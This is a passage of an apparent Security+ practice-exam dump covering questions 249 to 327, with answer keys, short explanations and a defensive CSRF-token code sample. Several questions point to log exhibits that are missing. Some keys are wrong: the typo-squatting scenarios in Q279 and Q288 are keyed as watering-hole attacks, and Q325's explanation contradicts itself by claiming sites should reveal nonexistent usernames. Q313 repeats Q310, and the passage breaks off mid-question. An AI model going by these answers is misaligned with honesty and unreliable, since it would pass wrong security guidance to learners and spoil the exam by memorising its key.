QUESTION 249
A company has determined that if its computer-based manufacturing is not functioning for 12
consecutive hours, it will lose more money than it costs to maintain the equipment. Which of the
following must be less than 12 hours to maintain a positive total cost of ownership?
A. MTBF
B. RPO
C. RTO
D. MTTR
Answer: C
QUESTION 250
Which of the following control sets should a well-written BCP include? (Select THREE)
A. Preventive
B. Detective
C. Deterrent
D. Corrective
E. Compensating
F. Physical
G. Recovery
Answer: ADG
QUESTION 251
The manager who is responsible for a data set has asked a security engineer to apply encryption
to the data on a hard disk. The security engineer is an example of a:
A. data controller
B. data owner
C. data custodian
D. data processor
Answer: C
Explanation:
Data custodian: this role handles managing the system on which the data assets are stored. This
includes responsibility for enforcing access control, encryption, and backup/recovery measures on
behalf of the data owner, who decides what protection the data requires.
QUESTION 252
Which of the following disaster recovery tests is The LEAST time-consuming for the disaster
recovery team?
A. Tabletop
B. Parallel
C. Full interruption
D. Simulation
Answer: A
Explanation:
A tabletop exercise is a discussion-based walk-through of the plan in a meeting room: no systems are
touched, so it takes the least time and carries no risk to production. A simulation is a scripted
exercise in which the team rehearses its responses; parallel tests bring recovery systems up alongside
production, and full-interruption tests actually fail production over, which makes them the most
time-consuming and the most disruptive.
QUESTION 253
Some laptops recently went missing from a locked storage area that is protected by keyless
RFID-enabled locks. There is no obvious damage to the physical space. The security manager
identifies who unlocked the door, however, human resources confirms the employee was on
vacation at the time of the incident. Which of the following describes what MOST likely occurred?
A. The employee's physical access card was cloned.
B. The employee is colluding with human resources.
C. The employee's biometrics were harvested.
D. A criminal used lock picking tools to open the door.
Answer: A
QUESTION 254
Which of the following would be the BEST resource for a software developer who is looking to
improve secure coding practices for web applications?
A. OWASP
B. Vulnerability scan results
C. NIST CSF
D. Third-party libraries
Answer: A
Explanation:
OWASP (Open Web Application Security Project) is the BEST resource for a software developer
who is looking to improve secure coding practices for web applications. OWASP is a non-profit
organization that provides free and open resources for improving software security, including a
comprehensive list of web application security risks, secure coding guidelines, and testing tools.
QUESTION 255
A security analyst is reviewing logs on a server and observes the following output:
Which of the following is the security analyst observing?
A. A rainbow table attack
B. A password-spraying attack
C. A dictionary attack
D. A keylogger attack
Answer: C
QUESTION 256
A security analyst needs to make a recommendation for restricting access to certain segments of
the network using only data-link layer security.
Which of the following controls will the analyst MOST likely recommend?
A. MAC
B. ACL
C. BPDU
D. ARP
Answer: A
QUESTION 257
Several employees have noticed other bystanders can clearly observe a terminal where
passcodes are being entered.
Which of the following can be eliminated with the use of a privacy screen?
A. Shoulder surfing
B. Spear phishing
C. Impersonation attack
D. Card cloning
Answer: A
QUESTION 258
An organization routes all of its traffic through a VPN. Most users are remote and connect into a
corporate datacenter that houses confidential information. There is a firewall at the Internet border
followed by a DLP appliance, the VPN server and the datacenter itself.
Which of the following is the WEAKEST design element?
A. The DLP appliance should be integrated into a NGFW.
B. Split-tunnel connections can negatively impact the DLP appliance's performance.
C. Encrypted VPN traffic will not be inspected when entering or leaving the network.
D. Adding two hops in the VPN tunnel may slow down remote connections.
Answer: C
QUESTION 259
Which of the following are requirements that must be configured for PCI DSS compliance?
(Choose two.)
A. Testing security systems and processes regularly
B. Installing and maintaining a web proxy to protect cardholder data
C. Assigning a unique ID to each person with computer access
D. Encrypting transmission of cardholder data across private networks
E. Benchmarking security awareness training for contractors
F. Using vendor-supplied default passwords for system passwords
Answer: AC
Explanation:
PCI DSS requires that security systems and processes be tested regularly (Requirement 11) and that
each person with computer access be assigned a unique ID (Requirement 8). The standard requires
encryption of cardholder data when it crosses open, public networks, not only private ones; a web
proxy is not a stated requirement; and vendor-supplied defaults must be changed before a system
goes into use, never kept.
QUESTION 260
A network technician is installing a guest wireless network at a coffee shop. When a customer
purchases an item, the password for the wireless network is printed on the receipt so the
customer can log in.
Which of the following will the technician MOST likely configure to provide the highest level of
security with the least amount of overhead?
A. WPA-EAP
B. WEP-TKIP
C. WPA-PSK
D. WPS-PIN
Answer: C
Explanation:
WPA-PSK is a pre-shared key authentication method that uses a passphrase to encrypt data. It is
the most common type of WPA security and is relatively easy to configure. The passphrase can
be printed on the receipt, making it easy for customers to connect to the network.
QUESTION 261
A security engineer needs to implement an MDM solution that complies with the corporate mobile
device policy. The policy states that in order for mobile users to access corporate resources on
their devices, the following requirements must be met:
- Mobile device OSs must be patched up to the latest release.
- A screen lock must be enabled (passcode or biometric).
- Corporate data must be removed if the device is reported lost or
stolen.
Which of the following controls should the security engineer configure? (Choose two.)
A. Containerization
B. Storage segmentation
C. Posturing
D. Remote wipe
E. Full-device encryption
F. Geofencing
Answer: CD
Explanation:
Device posture checks (posturing) collect security-related device data, such as OS version and patch
level, screen-lock status, disk encryption and antivirus state, so that access to corporate resources
can be conditioned on the device being compliant; this covers the patch-level and screen-lock
requirements. Remote wipe removes corporate data from a device that is reported lost or stolen.
QUESTION 262
Which of the following would BEST identify and remediate a data-loss event in an enterprise
using third-party, web-based services and file-sharing platforms?
A. SIEM
B. CASB
C. UTM
D. DLP
Answer: B
Explanation:
A Cloud Access Security Broker (CASB) is a security solution that sits between an enterprise's
on-premises infrastructure and its cloud-based applications and services. It helps to secure the
use of these cloud-based services by providing visibility, control, and protection for data in the
cloud. A CASB can help to identify and remediate data-loss events by monitoring the use of
cloud-based services, identifying unusual or suspicious activity, and alerting the appropriate
personnel when necessary. It can also help to prevent data loss by enforcing policies to control
the access and use of data in the cloud, and by providing encryption and other security measures
to protect data in transit and at rest.
QUESTION 263
A forensics examiner is attempting to dump passwords cached in the physical memory of a live
system but keeps receiving an error message. Which of the following BEST describes the cause
of the error?
A. The examiner does not have administrative privileges to the system.
B. The system must be taken offline before a snapshot can be created.
C. Checksum mismatches are invalidating the disk image.
D. The swap file needs to be unlocked before it can be accessed.
Answer: A
QUESTION 264
To reduce overhead, an organization wants to move from an on-premises email solution to a
cloud-based email solution. At this time, no other services will be moving. Which of the following
cloud models would BEST meet the needs of the organization?
A. MaaS
B. IaaS
C. SaaS
D. PaaS
Answer: C
Explanation:
Software as a service (SaaS) allows users to connect to and use cloud-based apps over the
Internet. Common examples are email, calendaring, and office tools (such as Microsoft Office
365).
QUESTION 265
A security manager for a retailer needs to reduce the scope of a project to comply with PCI DSS.
The PCI data is located in different offices than where credit cards are accepted. All the offices
are connected via MPLS back to the primary datacenter. Which of the following should the
security manager implement to achieve the objective?
A. Segmentation
B. Containment
C. Geofencing
D. Isolation
Answer: A
QUESTION 266
A company is launching a new internet platform for its clients. The company does not want to
implement its own authorization solution but instead wants to rely on the authorization provided
by another platform.
Which of the following is the BEST approach to implement the desired solution?
A. OAuth
B. TACACS+
C. SAML
D. RADIUS
Answer: A
QUESTION 267
The facilities supervisor for a government agency is concerned about unauthorized access to
environmental systems in the event the staff WiFi network is breached. Which of the following
would BEST address this security concern?
A. Install a smart meter on the staff WiFi.
B. Place the environmental systems in the same DHCP scope as the staff WiFi.
C. Implement Zigbee on the staff WiFi access points.
D. Segment the staff WiFi network from the environmental systems network.
Answer: D
QUESTION 268
A security analyst is reviewing the output of a web server log and notices a particular account is
attempting to transfer large amounts of money:
Which of the following types of attack is MOST likely being conducted?
A. SQLi
B. CSRF
C. Session replay
D. API
Answer: B
Explanation:
Cross-site request forgery (CSRF) is a vulnerability in which an attacker causes a victim's browser to
send a request to a site where the victim is already authenticated, so the action is performed with the
victim's privileges: transferring funds to an attacker's account, changing the victim's email address,
and so on. The browser attaches the session cookie automatically, which is why the server sees a
request from the legitimate account. A transfer the account holder did not initiate is the classic
symptom.
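Worked example (added here; not from the page or any named product): a synchronizer-token check
that stops the forged transfer described above. The endpoint, session identifiers and form fields are
hypothetical. The browser attaches the victim's session cookie automatically, but the token lives in
the page body, which the attacker's site cannot read, and because the token's MAC is bound to the
session a token minted in the attacker's own session does not validate for the victim.

```python
import hashlib
import hmac
import os
import secrets

# Assumption for this example: one server-side secret per deployment, never sent to the client.
SERVER_SECRET = os.urandom(32)


def issue_csrf_token(session_id):
    """Synchronizer-style token: nonce.HMAC(secret, session_id:nonce).
    Binding the MAC to the session means a token lifted from the attacker's
    own session does not validate for the victim's session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, ("%s:%s" % (session_id, nonce)).encode(), hashlib.sha256).hexdigest()
    return nonce + "." + mac


def csrf_token_valid(session_id, token):
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, ("%s:%s" % (session_id, nonce)).encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(request):
    """Hypothetical transfer endpoint. request is a dict with 'method',
    'cookie_session' (the session cookie the browser sends automatically,
    which is exactly what CSRF abuses) and 'form' (the POSTed fields)."""
    if request.get("method") != "POST":
        return "405 state-changing action requires POST"
    session = request["cookie_session"]
    form = request.get("form", {})
    if not csrf_token_valid(session, form.get("csrf_token", "")):
        return "403 CSRF token missing or invalid"
    return "200 transferred %s to %s" % (form["amount"], form["to"])


if __name__ == "__main__":
    victim = "sess-victim"
    token = issue_csrf_token(victim)
    # Legitimate submission from the site's own page, which carries the token.
    print(handle_transfer({"method": "POST", "cookie_session": victim,
                           "form": {"csrf_token": token, "amount": "50", "to": "landlord"}}))
    # Forged submission from the attacker's page: the browser attaches the
    # victim's cookie, but the attacker cannot read or mint the token.
    print(handle_transfer({"method": "POST", "cookie_session": victim,
                           "form": {"amount": "5000", "to": "attacker"}}))
```

Rejecting GET for state changes matters on its own: a forged request can be as simple as an image
tag pointing at the transfer URL, and no token check runs if the endpoint accepts it.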
QUESTION 269
A security analyst is logged into a Windows file server and needs to see who is accessing files
and from which computers.
Which of the following tools should the analyst use?
A. netstat
B. net share
C. netcat
D. nbtstat
E. net session
Answer: E
Explanation:
net session lists the sessions currently open on the file server together with the computer name and
user account on the other end, which is exactly "who is accessing files and from which computers".
netstat shows socket state without user names, net share lists the folders being shared, nbtstat
reports NetBIOS name information, and netcat is a connection tool, not a monitoring one.
QUESTION 270
After consulting with the Chief Risk Officer (CRO), a manager decides to acquire cybersecurity
insurance for the company.
Which of the following risk management strategies is the manager adopting?
A. Risk acceptance
B. Risk avoidance
C. Risk transference
D. Risk mitigation
Answer: C
QUESTION 271
A company is designing the layout of a new datacenter so it will have an optimal environmental
temperature.
Which of the following must be included? (Select TWO)
A. An air gap
B. A cold aisle
C. Removable doors
D. A hot aisle
E. An IoT thermostat
F. A humidity monitor
Answer: BD
Explanation:
Hot-aisle/cold-aisle arrangement is the layout decision that controls temperature: rack fronts face
each other across a cold aisle fed with chilled air, and rack exhausts face each other across a hot aisle
that returns warm air to the air handlers, so hot and cold air do not mix. A thermostat and a humidity
monitor measure the environment but are not elements of the room layout.
QUESTION 272
A security analyst is investigating an incident to determine what an attacker was able to do on a
compromised laptop. The analyst reviews the following SIEM log:
Which of the following describes the method that was used to compromise the laptop?
A. An attacker was able to move laterally from PC1 to PC2 using a pass-the-hash attack
B. An attacker was able to bypass application whitelisting by emailing a spreadsheet attachment
with an embedded PowerShell in the file
C. An attacker was able to install malware to the CAasdf234 folder and use it to gain
administrator rights and launch Outlook
D. An attacker was able to phish user credentials successfully from an Outlook user profile
Answer: B
Explanation:
Based on the provided information, it appears that the attacker was able to bypass application
whitelisting by emailing a spreadsheet attachment with an embedded PowerShell in the file, as
indicated by the "New Process" event with the process name "lat.ps1" and the "Creator Process
Name" of "powershell.exe". This suggests that the attacker was able to execute a PowerShell
script to run malicious code.
QUESTION 273
A company has decided to move its operations to the cloud. It wants to utilize technology that will
prevent users from downloading company applications for personal use, restrict data that is
uploaded, and have visibility into which applications are being used across the company.
Which of the following solutions will BEST meet these requirements?
A. An NGFW
B. A CASB
C. Application whitelisting
D. An NG-SWG
Answer: B
QUESTION 274
An attacker is exploiting a vulnerability that does not have a patch available. Which of the
following is the attacker exploiting?
A. Zero-day
B. Default permissions
C. Weak encryption
D. Unsecure root accounts
Answer: A
QUESTION 275
An attacker has successfully exfiltrated several non-salted password hashes from an online
system.
Given the logs below:
Which of the following BEST describes the type of password attack the attacker is performing?
A. Dictionary
B. Pass-the-hash
C. Brute-force
D. Password spraying
Answer: A
Explanation:
A password of that length recovered in a few minutes points to a dictionary attack: the attacker
hashed candidate words from a word list and compared them with the unsalted hashes. An exhaustive
brute-force search over passwords of that length would take years.
QUESTION 276
A company is upgrading its wireless infrastructure to WPA2-Enterprise using EAP-TLS.
Which of the following must be part of the security architecture to achieve AAA? (Select TWO)
A. DNSSEC
B. Reverse proxy
C. VPN concentrator
D. PKI
E. Active Directory
F. RADIUS
Answer: DF
QUESTION 277
A company has a flat network that is deployed in the cloud. Security policy states that all
production and development servers must be segmented. Which of the following should be used
to design the network to meet the security requirements?
A. CASB
B. VPC
C. Perimeter network
D. WAF
Answer: B
Explanation:
Security policy states that all production and development servers must be segmented.
You could use multiple VPCs within your cloud environment to segment the network.
QUESTION 278
An information security incident recently occurred at an organization, and the organization was
required to report the incident to authorities and notify the affected parties. When the
organization's customers became aware of the incident, some reduced their orders or stopped
placing orders entirely. Which of the following is the organization experiencing?
A. Reputation damage
B. Identity theft
C. Anonymization
D. Interrupted supply chain
Answer: A
QUESTION 279
An attacker is attempting to exploit users by creating a fake website with the URL users. Which of
the following social-engineering attacks does this describe?
A. Information elicitation
B. Typo squatting
C. Impersonation
D. Watering-hole attack
Answer: D
QUESTION 280
Following a prolonged datacenter outage that affected web-based sales a company has decided
to move its operations to a private cloud solution. The security team has received the following
requirements:
- There must be visibility into how teams are using cloud-based services.
- The company must be able to identify when data related to payment cards is being sent to the cloud.
- Data must be available regardless of the end user's geographic location.
- Administrators need a single pane-of-glass view into traffic and trends.
Which of the following should the security analyst recommend?
A. Create firewall rules to restrict traffic to other cloud service providers.
B. Install a DLP solution to monitor data in transit.
C. Implement a CASB solution.
D. Configure a web-based content filter.
Answer: C
Explanation:
The security team has received the following requirements:
- how teams are using cloud-based services.
- identify when data related to payment cards is being sent to the cloud.
- single pane-of-glass view into traffic and trends.
QUESTION 281
A security engineer has enabled two-factor authentication on all workstations. Which of the
following approaches are the MOST secure? (Choose two.)
A. Password and security question
B. Password and CAPTCHA
C. Password and smart card
D. Password and fingerprint
E. Password and one-time token
F. Password and voice
Answer: CD
QUESTION 282
A large enterprise has moved all its data to the cloud behind strong authentication and
encryption.
A sales director recently had a laptop stolen and, later, enterprise data was found to have been
compromised from a database.
Which of the following was the MOST likely cause?
A. Shadow IT
B. Credential stuffing
C. SQL injection
D. Man-in-the-browser
E. Bluejacking
Answer: A
QUESTION 283
During a routine scan of a wireless segment at a retail company, a security administrator
discovers several devices are connected to the network that do not match the company's naming
convention and are not in the asset inventory. WiFi access is protected with 256-bit encryption
via WPA2. Physical access to the company's facility requires two-factor authentication using a
badge and a passcode.
Which of the following should the administrator implement to find and remediate the issue?
(Choose two.)
A. Check the SIEM for failed logins to the LDAP directory.
B. Enable MAC filtering on the switches that support the wireless network.
C. Run a vulnerability scan on all the devices in the wireless network.
D. Deploy multifactor authentication for access to the wireless network.
E. Scan the wireless network for rogue access points.
F. Deploy a honeypot on the network.
Answer: BE
QUESTION 284
A security analyst is hardening a Linux workstation and must ensure it has public keys forwarded
to remote systems for secure login.
Which of the following steps should the analyst perform to meet these requirements? (Choose
two.)
A. Forward the keys using ssh-copy-id.
B. Forward the keys using scp.
C. Forward the keys using ssh -i.
D. Forward the keys using openssl -s.
E. Forward the keys using ssh-keygen.
Answer: AB
Explanation:
ssh-copy-id installs an SSH key on a server as an authorized key. Its purpose is to provide
access without requiring a password for each login.
Normally, scp asks for a password. To avoid this, or to automate file copying in scripts, public key
authentication is usually used.
QUESTION 285
A company recently experienced an attack in which a malicious actor was able to exfiltrate data
by cracking stolen passwords using a rainbow table to access the sensitive data.
Which of the following should a security engineer do to prevent such an attack in the future?
A. Use password hashing.
B. Enforce password complexity.
C. Implement password salting.
D. Disable password reuse.
Answer: C
QUESTION 286
The website http://companywebsite.com requires users to provide personal information, including
security question responses, for registration.
Which of the following would MOST likely cause a data breach?
A. Lack of input validation
B. Open permissions
C. Unsecure protocol
D. Missing patches
Answer: C
QUESTION 287
The process of passively gathering information prior to launching a cyberattack is called:
A. tailgating
B. reconnaissance
C. pharming
D. prepending
Answer: B
QUESTION 288
An attacker is attempting to exploit users by creating a fake website with the URL
www.validwebsite.com. The attacker's intent is to imitate the look and feel of a legitimate website
to obtain personal information from unsuspecting users.
Which of the following social-engineering attacks does this describe?
A. Information elicitation
B. Typo squatting
C. Impersonation
D. Watering-hole attack
Answer: D
QUESTION 289
An attacker is trying to gain access by installing malware on a website that is known to be visited
by the target victims. Which of the following is the attacker MOST likely attempting?
A. A spear-phishing attack
B. A watering-hole attack
C. Typo squatting
D. A phishing attack
Answer: B
QUESTION 290
Which of the following types of controls is a CCTV camera that is not being monitored?
A. Detective
B. Deterrent
C. Physical
D. Preventive
Answer: B
Explanation:
CCTV (closed circuit television) is a cheaper means of providing surveillance than maintaining
separate guards at each gateway or zone, though still not cheap to set up if the infrastructure is
not already in place on the premises. It is also quite an effective DETERRENT.
QUESTION 291
A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created
some rules, but the network now seems to be unresponsive. All connections are being dropped
by the firewall. Which of the following would be the BEST option to remove the rules?
A. # iptables -t mangle -X
B. # iptables -F
C. # iptables -Z
D. # iptables -P INPUT -j DROP
Answer: B
Explanation:
The "-F" flag flushes all the existing iptables rules, allowing for a fresh start. This should get
the network back online and allow the administrator to start creating new rules that will not cause
any network disruption.
QUESTION 292
A security analyst is configuring a large number of new company-issued laptops. The analyst
received the following requirements:
- The devices will be used internationally by staff who travel extensively.
- Occasional personal use is acceptable due to the travel requirements.
- Users must be able to install and configure sanctioned programs and productivity suites.
- The devices must be encrypted.
- The devices must be capable of operating in low-bandwidth environments.
Which of the following would provide the GREATEST benefit to the security posture of the
devices?
A. Configuring an always-on VPN
B. Implementing application whitelisting
C. Requiring web traffic to pass through the on-premises content filter
D. Setting the antivirus DAT update schedule to weekly
Answer: A
QUESTION 293
A privileged user at a company stole several proprietary documents from a server. The user also
went into the log files and deleted all records of the incident. The systems administrator has just
informed investigators that other log files are available for review.
Which of the following did the administrator MOST likely configure that will assist the
investigators?
A. Memory dumps
B. The syslog server
C. The application logs
D. The log retention policy
Answer: B
QUESTION 294
A security engineer at an offline government facility is concerned about the validity of an SSL
certificate. The engineer wants to perform the fastest check with the least delay to determine if
the certificate has been revoked.
Which of the following would BEST meet these requirements?
A. RA
B. OCSP
C. CRL
D. CSR
Answer: C
Explanation:
OCSP (Online Certificate Status Protocol) needs to send a request to obtain the status of the
certificate. Because the site is offline, a CRL would BEST meet the requirements.
QUESTION 295
A security analyst needs to perform periodic vulnerability scans on production systems.
Which of the following scan types would produce the BEST vulnerability scan report?
A. Port
B. Intrusive
C. Host discovery
D. Credentialed
Answer: D
QUESTION 296
A company was recently breached. Part of the company's new cybersecurity strategy is to
centralize the logs from all security devices.
Which of the following components forwards the logs to a central source?
A. Log enrichment
B. Log aggregation
C. Log parser
D. Log collector
Answer: D
Explanation:
Log collectors are pieces of software that gather data from multiple independent
sources and feed it into a unified destination such as a SIEM. Log collectors collect the logs, and
the SIEM solution then stores them.
QUESTION 297
Given the following logs:
Which of the following BEST describes the type of attack that is occurring?
A. Rainbow table
B. Dictionary
C. Password spraying
D. Pass-the-hash
Answer: A
Explanation:
Rainbow table attacks are a type of attack that attempts to discover the password from the hash.
A rainbow table is a huge database of possible passwords with the precomputed hashes for
each. It helps to look at the process of how some password cracker applications discover
passwords without a rainbow table. Assume that an attacker has the hash of a password.
QUESTION 298
An organization is concerned that its hosted web servers are not running the most updated
version of the software.
Which of the following would work BEST to help identify potential vulnerabilities?
A. hping3 -S comptia.org -p 80
B. nc -l -v comptia.org -p 80
C. nmap comptia.org -p 80 -sV
D. nslookup -port 80 comptia.org
Answer: C
Explanation:
Nmap is used to discover hosts and services on a computer network by sending packets and
analyzing the responses. Nmap provides a number of features for probing computer networks,
including host discovery and service and operating system detection.
QUESTION 299
Which of the following will MOST likely cause machine learning and AI-enabled systems to
operate with unintended consequences?
A. Stored procedures
B. Buffer overflows
C. Data bias
D. Code reuse
Answer: C
Explanation:
https://lionbridge.ai/articles/7-types-of-data-bias-in-machine-learning/
QUESTION 300
An organization blocks user access to command-line interpreters but hackers still managed to
invoke the interpreters using native administrative tools.
Which of the following should the security team do to prevent this from happening in the future?
A. Implement HIPS to block inbound and outbound SMB ports 139 and 445.
B. Trigger a SIEM alert whenever the native OS tools are executed by the user.
C. Disable the built-in OS utilities as long as they are not needed for functionality.
D. Configure the AV to quarantine the native OS tools whenever they are executed.
Answer: C
QUESTION 301
An analyst has determined that a server was not patched and an external actor exfiltrated data on
port 139.
Which of the following sources should the analyst review to BEST ascertain how the incident
could have been prevented?
A. The vulnerability scan output
B. The security logs
C. The baseline report
D. The correlation of events
Answer: B
QUESTION 302
A local coffee shop runs a small WiFi hotspot for its customers that utilizes WPA2-PSK. The
coffee shop would like to stay current with security trends and wants to implement WPA3 to make
its WiFi even more secure. Which of the following technologies will the coffee shop MOST likely
use in place of PSK?
A. WEP
B. MSCHAP
C. WPS
D. SAE
Answer: D
QUESTION 303
A security analyst is running a vulnerability scan to check for missing patches during a suspected
security incident.
During which of the following phases of the response process is this activity MOST likely
occurring?
A. Containment
B. Identification
C. Recovery
D. Preparation
Answer: B
QUESTION 304
Which of the following is MOST likely to contain ranked and ordered information on the likelihood
and potential impact of catastrophic events that may affect business processes and systems,
while also highlighting the residual risks that need to be managed after mitigating controls have
been implemented?
A. An RTO report
B. A risk register
C. A business impact analysis
D. An asset value register
E. A disaster recovery plan
Answer: B
Explanation:
A risk register is a document that records all of your organization's identified risks, the likelihood
and consequences of each risk occurring, the actions you are taking to reduce those risks, and who is
responsible for managing them.
QUESTION 305
A network engineer at a company with a web server is building a new web environment with the
following requirements:
- Only one web server at a time can service requests.
- If the primary web server fails, a failover needs to occur to ensure the secondary web server
becomes the primary.
Which of the following load-balancing options BEST fits the requirements?
A. Cookie-based
B. Active-passive
C. Persistence
D. Round robin
Answer: B
QUESTION 306
A university is opening a facility in a location where there is an elevated risk of theft. The university
wants to protect the desktops in its classrooms and labs.
Which of the following should the university use to BEST protect these assets deployed in the
facility?
A. Visitor logs
B. Cable locks
C. Guards
D. Disk encryption
E. Motion detection
Answer: B
QUESTION 307
A systems analyst is responsible for generating a new digital forensics chain-of-custody form.
Which of the following should the analyst include in this documentation? (Choose two.)
A. The order of volatility
B. A CRC32 checksum
C. The provenance of the artifacts
D. The vendor's name
E. The date and time
F. A warning banner
Answer: CE
Explanation:
A digital forensics chain-of-custody form is a document that provides a clear and complete record
of the sequence of events that occurs from the time a digital artifact is collected until it is analyzed
and used as evidence. The form should include the date and time when the artifact was collected,
so that the exact time it was obtained can be determined. Additionally, the form should include
information about the provenance of the artifact, such as its origin and any steps that have been
taken to maintain its integrity. The order of volatility, a CRC32 checksum, the vendor’s name, and
a warning banner are not essential components of a digital forensics chain-of-custody form.
QUESTION 308
A company is setting up a web server on the Internet that will utilize both encrypted and
unencrypted web-browsing protocols.
A security engineer runs a port scan against the server from the Internet and sees the following
output:
Which of the following steps would be best for the security engineer to take NEXT?
A. Allow DNS access from the Internet.
B. Block SMTP access from the Internet.
C. Block HTTPS access from the Internet.
D. Block SSH access from the Internet.
Answer: D
QUESTION 309
Which of the following is the BEST reason to maintain a functional and effective asset
management policy that aids in ensuring the security of an organization?
A. To provide data to quantify risk based on the organization's systems.
B. To keep all software and hardware fully patched for known vulnerabilities.
C. To only allow approved, organization-owned devices onto the business network.
D. To standardize by selecting one laptop model for all users in the organization.
Answer: B
QUESTION 310
An attacker was easily able to log in to a company's security camera by performing a basic online
search for a setup guide for that particular camera brand and model.
Which of the following BEST describes the configurations the attacker exploited?
A. Weak encryption
B. Unsecure protocols
C. Default settings
D. Open permissions
Answer: C
QUESTION 311
A cloud administrator is configuring five compute instances under the same subnet in a VPC.
Three instances are required to communicate with one another, and the other two must be
logically isolated from all other instances in the VPC.
Which of the following must the administrator configure to meet this requirement?
A. One security group
B. Two security groups
C. Three security groups
D. Five security groups
Answer: B
QUESTION 312
An analyst is trying to identify insecure services that are running on the internal network.
After performing a port scan the analyst identifies that a server has some insecure services
enabled on default ports.
Which of the following BEST describes the services that are currently running and the secure
alternatives for replacing them? (Select THREE)
A. SFTP, FTPS
B. SNMPv2, SNMPv3
C. HTTP, HTTPS
D. TFTP, FTP
E. SNMPv1, SNMPv2
F. Telnet, SSH
G. TLS, SSL
H. POP, IMAP
I. Login, rlogin
Answer: BCF
Explanation:
SNMPv3 adds cryptographic security to SNMPv2. SNMPv3 replaces the simple password
sharing (in clear text) of SNMPv2 with much more secure encoded security parameters.
HTTPS is HTTP with encryption and verification. The only difference between the two protocols is
that HTTPS uses TLS (SSL) to encrypt normal HTTP requests and responses, and to digitally
sign those requests and responses. As a result, HTTPS is far more secure than HTTP.
Telnet transfers data in plain text. SSH, on the other hand, sends data in encrypted form over a
secure channel, and because it is designed to be more secure, it uses public key cryptography for
authentication.
QUESTION 313
An attacker was easily able to log in to a company's security camera by performing a basic online
search for a setup guide for that particular camera brand and model.
Which of the following BEST describes the configurations the attacker exploited?
A. Weak encryption
B. Unsecure protocols
C. Default settings
D. Open permissions
Answer: C
QUESTION 314
A security architect at a large, multinational organization is concerned about the complexities and
overhead of managing multiple encryption keys securely in a multicloud provider environment.
The security architect is looking for a solution with reduced latency to allow the incorporation of
the organization's existing keys and to maintain consistent, centralized control and management
regardless of the data location.
Which of the following would BEST meet the architect's objectives?
A. Trusted Platform Module
B. IaaS
C. HSMaaS
D. PaaS
E. Key Management Service
Answer: E
QUESTION 315
A security operations analyst is using the company's SIEM solution to correlate alerts. Which of
the following stages of the incident response process is this an example of?
A. Eradication
B. Recovery
C. Identification
D. Preparation
Answer: C
QUESTION 316
A company uses specially configured workstations for any work that requires administrator
privileges to its Tier 0 and Tier 1 systems. The company follows a strict process to harden
systems immediately upon delivery. Even with these strict security measures in place, an incident
occurred from one of the workstations. The root cause appears to be that the SoC was tampered
with or replaced. Which of the following MOST likely occurred?
A. Fileless malware
B. A downgrade attack
C. A supply-chain attack
D. A logic bomb
E. Misconfigured BIOS
Answer: C
QUESTION 317
A hospital's administration is concerned about a potential loss of patient data that is stored on
tablets. A security administrator needs to implement controls to alert the SOC any time the
devices are near exits. Which of the following would BEST achieve this objective?
A. Geotargeting
B. Geolocation
C. Geotagging
D. Geofencing
Answer: D
QUESTION 318
A SOC is implementing an insider-threat-detection program. The primary concern is that users
may be accessing confidential data without authorization. Which of the following should be
deployed to detect a potential insider threat?
A. A honeyfile
B. A DMZ
C. DLP
D. File integrity monitoring
Answer: A
QUESTION 319
A desktop support technician recently installed a new document-scanning software program on a
computer. However, when the end user tried to launch the program, it did not respond.
Which of the following is MOST likely the cause?
A. A new firewall rule is needed to access the application.
B. The system was quarantined for missing software updates.
C. The software was not added to the application whitelist.
D. The system was isolated from the network due to infected software.
Answer: C
QUESTION 320
A company has been experiencing very brief power outages from its utility company over the last
few months. These outages only last for one second each time. The utility company is aware of
the issue and is working to replace a faulty transformer. Which of the following BEST describes
what the company should purchase to ensure its critical servers and network devices stay online?
A. Dual power supplies
B. A UPS
C. A generator
D. A PDU
Answer: B
QUESTION 321
After a phishing scam for a user's credentials, the red team was able to craft a payload to deploy
on a server. The attack allowed the installation of malicious software that initiates a new remote
session.
Which of the following types of attacks has occurred?
A. Privilege escalation
B. Session replay
C. Application programming interface
D. Directory traversal
Answer: A
QUESTION 322
A security analyst notices several attacks are being blocked by the NIPS but does not see
anything on the boundary firewall logs. The attack seems to have been thwarted. Which of the
following resiliency techniques was applied to the network to prevent this attack?
A. NIC teaming
B. Port mirroring
C. Defense in depth
D. High availability
E. Geographic dispersal
Answer: C
QUESTION 323
A network administrator at a large organization is reviewing methods to improve the security of
the wired LAN. Any security improvement must be centrally managed and allow corporate-owned
devices to have access to the intranet but limit others to Internet access only. Which of the
following should the administrator recommend?
A. 802.1X utilizing the current PKI infrastructure
B. SSO to authenticate corporate users
C. MAC address filtering with ACLs on the router
D. PAM for user account management
Answer: A
QUESTION 324
An organization is having difficulty correlating events from its individual AV, EDR, DLP, SWG,
WAF, MDM, HIPS, and CASB systems. Which of the following is the BEST way to improve the
situation?
A. Remove expensive systems that generate few alerts.
B. Modify the systems to alert only on critical issues.
C. Utilize a SIEM to centralize logs and dashboards.
D. Implement a new syslog/NetFlow appliance.
Answer: C
QUESTION 325
An attacker is attempting to harvest user credentials on a client's website. A security analyst
notices multiple attempts with random usernames and passwords. When the analyst types in a
random username and password, the logon screen displays the following message:
Which of the following should the analyst recommend be enabled?
A. Input validation
B. Obfuscation
C. Error handling
D. Username lockout
Answer: D
Explanation:
When an attacker attempts to log in to a website with a username that does not exist, the website
should display a message indicating that the username does not exist. This will prevent the
attacker from knowing whether or not they have guessed a valid username.
If the website simply displays the message "Incorrect username or password," the attacker will be
able to keep trying different usernames until they find one that works. This could allow the
attacker to gain access to the website even if they do not know the correct password.
Username lockout is a security feature that prevents an attacker from trying to log in with a
particular username too many times. If an attacker exceeds the lockout threshold, they will be
temporarily blocked from trying to log in with that username. This will make it more difficult for the
attacker to gain access to the website.
In this case, the analyst should recommend that the client enable username lockout to prevent
the attacker from guessing valid usernames.
QUESTION 326
A security analyst needs to implement security features across smartphones, laptops, and
tablets. Which of the following would be the MOST effective across heterogeneous platforms?
A. Enforcing encryption
B. Deploying GPOs
C. Removing administrative permissions
D. Applying MDM software
Answer: D
Explanation:
MDM (Mobile Device Management) is software that assists in managing, monitoring, and
securing the many mobile devices, such as tablets, smartphones, and laptops, that are used in the
organization to access corporate information.
QUESTION 327
The cost of removable media and the security risks of transporting data have become too great
